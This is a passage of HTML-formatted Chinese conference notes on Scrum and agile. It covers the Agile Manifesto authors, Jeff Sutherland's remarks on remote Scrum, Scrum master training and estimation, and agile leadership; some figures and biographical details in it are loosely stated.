        美国计算机程序员，第一个维基的发明者，对面向对象编程做出了贡献。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Martin Fowler:
        英国软件开发人员，作家，精通重构、持续集成和敏捷方法。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">James Grenning:
        美国软件工程师和顾问，专注于敏捷开发、测试驱动开发和嵌入式系统。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Jim Highsmith:
        美国软件工程师、作家，精通敏捷方法和自适应软件开发。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Andrew Hunt:
        加拿大软件开发人员和作者，《实用程序员》的合著者，精通敏捷开发、软件设计模式和TDD。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Ron Jeffries:
        美国软件开发人员和顾问，Extreme Programming (XP)的共同创始人，精通敏捷方法。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Jon Kern:
        美国软件工程师和顾问，精通敏捷开发和Extreme Programming (XP)。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Brian Marick:
        美国软件工程师和顾问，精通敏捷开发、TDD和XP。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Robert C.
        Martin: 美国软件工程师、作家，精通敏捷软件开发、软件设计模式和SOLID编程原则。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Steve Mellor:
        英国计算机科学家和软件工程师，提出了面向对象分析和设计（OOAD）的概念。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Ken Schwaber:
        美国软件工程师和顾问，Scrum方法的创始人之一。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-size: 12px;"><span style="font-family: &#34;Microsoft YaHei&#34;;">Jeff Sutherland:
        美国软件工程师和顾问，Scrum方法的创始人之一。【</span><span style="font-family: &#34;Microsoft YaHei&#34;;color: red;">宗师泰斗</span><span style="font-family: &#34;Microsoft YaHei&#34;;">】</span></span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Dave Thomas:
        加拿大软件工程师和作者，《Pragmatic Programmer》和《Programming
        Elixir》的合着者，也是Agile联盟的创始人之一。</span></p></li></ol></ul></td></tr></tbody></table><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;">敏捷宣言哪一条可以改？</h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">2011</span><span lang="zh-CN">年，敏捷宣言的团队再次碰面，</span><span lang="zh-CN">近千名听众，最后听众提出上述问题。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="zh-CN">Ron Jeffries说，</span><span style="font-family:微软雅黑;" lang="yo">第二条</span><span style="font-family:微软雅黑;" lang="zh-CN">有关价值最重要，我们真心如此：</span><span style="font-family:微软雅黑;color:red;" lang="yo">每个迭代</span><span style="font-family:
微软雅黑;" lang="yo">结束，都是</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="yo">向</span><span style="font-family:微软雅黑;color:red;" lang="yo">最终用户</span><span style="font-family:
微软雅黑;" lang="yo">交付价值。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">Jeff</span><span lang="zh-CN">：</span><span lang="en-US"> </span><span lang="zh-CN">敏捷宣言是个有历史意义的文件，是大变革的宣言，是广泛使用的产品，不是软件，不会有新版了。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo"><span style="color: rgb(46, 117, 181);font-size: 14pt;">线上工作后，如何影响</span><span style="color: rgb(46, 117, 181);font-size: 14pt;font-family: Calibri;">scrum</span><span style="color: rgb(46, 117, 181);font-size: 14pt;">？</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">要让人真的连接，并能协作工作。疫情前</span><span lang="en-US">scrum</span><span lang="zh-CN">就有支持远程的案例，疫情期间表现更加明显。</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;font-weight:normal;font-style:
     normal;font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">适用于任意</span><span style="font-family:微软雅黑;font-size:11.0pt;font-weight:normal;font-style:
     normal;font-family:微软雅黑;font-size:11.0pt;" lang="yo">规模，上千，</span><span style="font-family:Calibri;font-size:11.0pt;font-weight:normal;font-style:
     normal;font-family:Calibri;font-size:11.0pt;" lang="yo">2000</span><span style="font-family:微软雅黑;font-size:11.0pt;font-weight:normal;font-style:
     normal;font-family:微软雅黑;font-size:11.0pt;" lang="yo">-300</span><span style="font-family:Calibri;font-size:11.0pt;font-weight:normal;font-style:
     normal;font-family:Calibri;font-size:11.0pt;" lang="en-US">0</span><span style="font-family:微软雅黑;font-size:11.0pt;font-weight:normal;font-style:
     normal;font-family:微软雅黑;font-size:11.0pt;" lang="yo">人</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">适用于任何行业，学校、儿童也在用</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">适用于远程工作，全球化、分布式，例如，有个团队，分布于加拿大、美国、俄罗斯，人员翻倍，效率不止翻倍。每个团队都有跨大洲的成员，没有单纯的本地团队。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="color:
red;" lang="en-US">scrum</span><span style="color:red;" lang="zh-CN">的本质（</span><span style="color:red;" lang="en-US">the thing about scrum is to…</span><span style="color:red;" lang="zh-CN">）是让任何东西都可见！所有人都知道发生了什么、人都在哪里</span><span lang="zh-CN">。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">甘特图有点用，但是不能起到协调分散在各处的人的作用。</p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">2007</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">年开始有很多提供“</span><span style="font-family:微软雅黑;" lang="zh-CN">虚拟的办公室”的软件，每个人都在一个房间里，谁和谁在合作也看得见，你可以进他的“房间”，别人可以看到你和谁在一个“房间”讨论，他们也可以加入。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" lang="yo">工具赋能远程工作，zoom比十年前的电话会议好非常多</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">游戏公司的老板：远程团队有时比都在现场更有效率，不会像在现场那样被频繁打断。就剩时差问题了。</p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;" lang="yo"><span style="font-family:Calibri;">Scrum master</span><span style="font-family:微软雅黑;">的成长之路</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">让初阶的人和高阶人在一起，受到培训。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">慢慢发展到没有经理，只有</span><span lang="en-US">sm</span><span lang="zh-CN">处理所有问题，对</span><span lang="en-US">sm</span><span lang="zh-CN">要求会更高。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">2016</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">年培训变了很多。一家丰田关联企业找上门要培训服务：</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">scrum</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">的基本培训是不够的，因为</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">sm</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">没有得到精益领域的基本培训</span></p></li><li><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">sm要知道精益，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">我们在</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">scrum</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">培训中增加了消除浪费的工具，</span></p></li><li><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">    vsm，流程效率，根因分析，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">A3</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">分析，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">基本的工具都要会用</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">2006</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">年开始为一家资本公司服务，持续服务了十几年：</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span lang="zh-CN" style="font-family: 微软雅黑;font-size: 11pt;">希望所有投资的公司都使用</span><span lang="en-US" style="font-family: 微软雅黑;font-size: 11pt;">scrum</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">培训后，所有人都懂</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">scrum</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">，但不知道如何用</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="en-US">scrum</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">来一起协同工作</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">去年的书很重要，总结十几年的经验，共有</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">8</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">-10</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">个高效团队的模式</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="yo">没人仅在一个scrum团队工作，像结对编程一样去和人打交道，走出去，取得经验，</span><span lang="zh-CN">交付结果。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><br/></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">第一步是知识</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">第二步要经验，知道该怎么做，要走出去，和他人一起工作。有这个想法，成为</span><span lang="en-US">sm</span><span lang="zh-CN">不难。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">驾照知识第一步，新手需要知道基本的东西。新手要上路，变得有经验，而不是造成很多车祸。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary="" style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tbody style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><tr style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><td style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" width="652.3333333333334"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">在《A Scrum
  Book: The Spirit of the
  Game》中，&#34;pattern&#34;指的是一种可重用的解决方案，可以用于解决常见的软件开发问题。Jeff
  Sutherland引入&#34;pattern&#34;的概念是为了帮助读者更好地应用Scrum框架，并提供一些特定领域的实践指南和最佳实践。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Scrum模式旨在描述Scrum框架的各个方面，并提供在实践中使用Scrum的具体建议和技巧。这些模式通常包括一个问题、相应的上下文和解决方案，以及如何实施解决方案的步骤。通过这些模式，团队可以更好地理解Scrum框架的核心原则，同时能够更好地应用它们来解决实际的软件开发问题。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">总之，Sutherland引入&#34;pattern&#34;的概念是为了帮助团队更好地应用Scrum框架，并提供针对不同领域和场景的实践指南和最佳实践。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">在《A Scrum
  Book: The Spirit of the Game》中，有一些被认为是Scrum框架核心模式的模式：</span></p><ul type="disc" style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;" class="list-paddingleft-1"><li style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12px;"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Sprint模式：用于规划、实施和评审Sprint。</span></p></li><li style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12px;"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Backlog模式：用于管理产品Backlog，包括对Backlog进行分类、排序和估算等。</span></p></li><li style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12px;"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Daily Scrum模式：用于在每天的站立会议上有效地协作。</span></p></li><li style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12px;"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Sprint
       Review模式：用于组织Sprint评审会议以获取有价值的反馈。</span></p></li><li style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12px;"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Sprint
       Retrospective模式：用于组织团队回顾会议以改进过程。</span></p></li><li style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12px;"><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">Release模式：用于管理发布，包括如何规划发布、准备发布和执行发布等。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 12px;">这些模式被视为Scrum框架的核心模式，它们涵盖了Scrum框架的各个方面，从规划到实施，从管理到改进。通过这些模式，团队可以更好地理解Scrum框架的核心原则，并将它们应用于软件开发过程中，以提高生产力和质量。</span></p></td></tr></tbody></table><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;">如何估算项目</h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">要获得支持，就要明确估算。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">现在有好的估算培训，有历史数据，一两个小时就能估算一个大项目，不需要一两周时间</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">团队要稳定，要有稳定数据。团队变化太大，估算没有用。</p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
微软雅黑;" lang="yo">非软件行业使用</span><span style="font-family:Calibri;" lang="yo">scrum</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">在增加么？</span></h2><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">2006</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">年</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">jeff</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">提出</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">scrum</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">时，就想着把</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">scrum</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">推广到软件行业以外的领域，绝</span><span style="font-family:微软雅黑;" lang="yo">大部分jeff的生意都不是软件行业</span><span style="font-family:微软雅黑;" lang="zh-CN">，而是石油、硬件、汽车、火箭，</span><span style="font-family:微软雅黑;" lang="en-US">scrum</span><span style="font-family:微软雅黑;" lang="zh-CN">人力，</span><span style="font-family:微软雅黑;" lang="en-US">scrum at scale(</span><span style="font-family:微软雅黑;" lang="zh-CN">投资公司要的</span><span style="font-family:微软雅黑;" lang="en-US">)</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">投资公司要求所有被投资的公司都要</span><span lang="en-US">scrum</span><span lang="zh-CN">，软件工程师很容易，他们提效很快，问题是公司的其他人要做到</span><span lang="en-US">scrum</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="zh-CN">可以把软件相关的元素从</span><span lang="en-US">srum</span><span lang="zh-CN">中拿出来（让</span><span lang="en-US">scrum</span><span lang="zh-CN">更通用）</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: red;"><span lang="en-US">Scrum.org</span><span lang="zh-CN">问卷调查</span><span lang="en-US">: </span><span lang="zh-CN">很多人的业务不是软件业的客户，超过软件本身。</span><span lang="en-US">scrum</span><span lang="zh-CN">的主要市场不再是软件。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">Jeff</span><span lang="zh-CN">的老婆有杰作，</span><span lang="en-US">2008</span><span lang="zh-CN">写了篇</span><span lang="en-US">IEEE</span><span lang="zh-CN">论文，把</span><span lang="en-US">s</span><span lang="yo">crum用在教堂，</span><span lang="zh-CN">教堂组织实现</span><span lang="yo">敏捷转型了</span><span lang="zh-CN">。往内部小的说，也可以是销售、营销等敏捷转型。</span></p><h1 style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:16.0pt;color:#14324D;">国内大神们开场</h1><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">如何脱颖而出而非随波逐流</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="font-size: 11pt;">适者生存和持续进化的秘密是什么</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">如何掌握发展的主动权</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">商业大师、宗师泰斗有什么新的洞察、心得</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span style="color:
red;" lang="zh-CN">【思】</span><span lang="zh-CN">希腊神话主神十来个，国内敏捷的主神，基本上也到齐了？了解过几位，是够</span><span lang="en-US">thinker</span><span lang="zh-CN">这个级别的。</span></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;" lang="yo"><span style="font-family:Calibri;"><span style="mso-spacerun:yes;"> </span></span><span style="font-family:微软雅黑;">敏捷领导力主题</span></h1><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">我认为速度是决定任何公司竞争力的根本因素，特别是当涉及到任何技术时，创新的速度根本上决定了哪些公司会成功。</p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5666666666666667" width="480" data-type="jpeg" data-w="1080" height="272" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=0dbeed92&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8icfNGuRf3eLMqm5BkJbgoHaeHYse2Imia9Aw2lJZGp0CHR1lhlQhG0iaw%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;">中国发展不仅仅是速度，而且是每天都有满足大众的新特性推出。</p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;"><span lang="en-US">amazon</span><span lang="zh-CN">每秒上线一个新特性</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:微软雅黑;" lang="yo">特斯拉</span><span style="font-family:微软雅黑;" lang="zh-CN">每周提供</span><span style="font-family:Calibri;" lang="en-US">20</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">个新的软件、硬件功能，</span><span style="font-family:微软雅黑;" lang="yo">比</span><span style="font-family:微软雅黑;" lang="zh-CN">传统</span><span style="font-family:微软雅黑;" lang="yo">汽车制造的更新速度快</span><span style="font-family:Calibri;" lang="yo">1000</span><span style="font-family:微软雅黑;" lang="yo">倍</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">2020</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">年上半年，有</span><span style="font-family:Calibri;" lang="en-US">3600</span><span style="font-family:
&#34;Microsoft YaHei&#34;;" lang="zh-CN">多家非敏捷企业破产。拥抱</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">scrum</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">的上市公司、创新速度快的企业，在疫情期间，股票也会大涨。</span></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5157407407407407" width="480" data-type="jpeg" data-w="1080" height="247" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ad7887b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8L9egQjtpWPjhV5ZEgDjLCt3QdVg4LgZSJUEpamchzDavibRmfRweYYA%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.6222222222222222" width="477" data-type="png" data-w="1080" height="296" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=e7befe76&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8hCjFHnX1Qjoicq2icysIjcqqK3cGnNouBGXHxDKl0HyULjeTbPIxtiaUw%2F640%3Fwx_fmt%3Dpng"/></p><h1 style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:16.0pt;color:#14324D;">创新的速度是成功的首要因素</h1><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span lang="zh-CN">敏捷转型，应用</span><span lang="en-US">scrum at scale</span><span lang="zh-CN">，可以发现公司有哪些地方需要</span><span lang="en-US">agile</span><span lang="zh-CN">，往往不是</span><span lang="en-US">IT，</span><span lang="zh-CN">而是供应链的其他地方（采购、合同、运输），</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span lang="en-US">G.Tome, John Deere</span><span lang="zh-CN">：</span><span lang="en-US">Scrum</span><span lang="zh-CN">可能始于软件开发，但它绝不是只能与软件开发挂钩。事实上，</span><span lang="en-US">scrum</span><span lang="zh-CN">最重要和最有影响力的实施讲发生在软件之外。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">这些逆流而上、振奋人心的故事，背后是什么领导力在支持呢？</p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5574074074074075" width="480" data-type="jpeg" data-w="1080" height="267" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=9ac61bc9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8vlhfXvPiceTswjnCV36hkP9bwDOUaXeKgTR1EB306srw4Ekq8GxZbww%2F640%3Fwx_fmt%3Djpeg"/></p><h1 style="margin:0in;font-family:微软雅黑;font-size:16.0pt;color:#14324D;">敏捷之后，管理到领导的巨大转变</h1><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">跟上团队的步伐，团队移动很快</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">学会放手</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">不再微观管理</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">沟通目标和愿景，而不是告诉人们做什么</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">询问需要什么帮忙</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">团队的职责增加了</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-ratio="0.5574074074074075" width="480" data-type="jpeg" data-w="1080" height="267" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=280c6096&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8ibN7ich9ZshX9j7I6TIxVyJ68o6WkEJ0GZEByrZ8MZeQ9tDlT3EzczHQ%2F640%3Fwx_fmt%3Djpeg"/></p><h1 style="margin:0in;font-family:微软雅黑;font-size:16.0pt;color:#14324D;">敏捷要点</h1><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">1 团队要小。</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">最佳</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">5</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">人团队</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">7人就变慢了。10人团队</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">更慢</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">团队越大，</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">延迟</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">和</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="yo">失败</span><span style="font-family:微软雅黑;font-size:11.0pt;" lang="zh-CN">可能性更大</span></p></li></ul><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><br/></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">2 要有愿景和目标，才能自我管理</span></p></li><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:red;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">告诉目标？不是告诉他们要做什么，这对传统的管理风格转变的挑战是最大的</span></p></li></ul><ul type="circle" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:微软雅黑;font-size:11.0pt;">释放团队的能力，赋权团队</span></p></li><ul type="disc" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span 